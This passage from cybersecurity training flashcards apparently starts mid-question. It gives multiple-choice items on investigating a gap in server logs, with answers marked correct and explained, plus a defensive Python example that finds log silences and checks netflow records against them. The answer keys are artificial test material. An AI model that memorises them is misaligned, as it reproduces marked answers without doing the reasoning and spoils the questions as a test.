B) An attacker deleted the logs to cover their tracks
C) A database error caused the logs to disappear
D) A software update removed the logs
✅ Correct Answer: B) An attacker deleted the logs to cover their tracks
Explanation:
Attackers routinely clear or delete logs to cover their tracks; a hole confined to the period of suspicious activity, with normal logging before and after, points to deliberate removal.
(A) Retention settings and log rotation remove the oldest data, not a 4-hour slice from the middle.
(C) A database error is less likely to remove only security logs.
(D) Software updates do not delete random logs.
What should the security team do next?
A) Investigate backups and alternative logging sources
B) Restore the missing logs from a previous backup
C) Review other security alerts during the missing log period
D) All of the above
✅ Correct Answer: D) All of the above
Explanation:
(A) Logs forwarded to a central collector or SIEM at write time survive deletion on the host, which is why forwarding should be in place before an incident.
(B) If backups exist, they can restore the logs.
(C) Checking other alerts and other sources (network flows, authentication servers, EDR) for the same window helps correlate suspicious activity.
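An added Python example, not part of these flashcards, of the first two steps above: locate the silence in the server's own log by looking for gaps longer than its normal cadence, then pull entries from an independent source that fall inside that window. The timestamps, the netflow entries and the 30-minute silence threshold are constructed for the demonstration.

```python
from datetime import datetime, timedelta

# Constructed timestamps from the database server's own log (not real data): one
# entry every five minutes from 01:00 to 02:00, nothing until 06:00, then normal.
SAMPLE_LOG_TIMES = (
    [datetime(2024, 5, 6, 1, 0) + timedelta(minutes=5 * i) for i in range(13)]
    + [datetime(2024, 5, 6, 6, 0) + timedelta(minutes=5 * i) for i in range(6)]
)

# Constructed entries from an independent source (netflow from the core switch).
SAMPLE_NETFLOW = [
    (datetime(2024, 5, 6, 3, 12), "10.0.0.5 -> db01:1433 (new session)"),
    (datetime(2024, 5, 6, 7, 30), "10.0.0.9 -> db01:1433 (backup job)"),
]


def find_log_gaps(timestamps, max_silence=timedelta(minutes=30)):
    """Return (start, end, length) for every silence longer than max_silence.
    The threshold is an assumption; derive it from the source's normal cadence."""
    ordered = sorted(timestamps)
    return [(a, b, b - a) for a, b in zip(ordered, ordered[1:]) if b - a > max_silence]


def events_inside_gaps(gaps, other_source):
    """Pull entries from an independent source that fall inside a gap: these are
    the records an attacker who only cleaned the local log could not reach."""
    return [event for event in other_source if any(a < event[0] < b for a, b, _ in gaps)]


if __name__ == "__main__":
    gaps = find_log_gaps(SAMPLE_LOG_TIMES)
    for start, end, length in gaps:
        print(f"silence from {start} to {end} ({length})")
    for when, what in events_inside_gaps(gaps, SAMPLE_NETFLOW):
        print(f"  other source at {when}: {what}")
```
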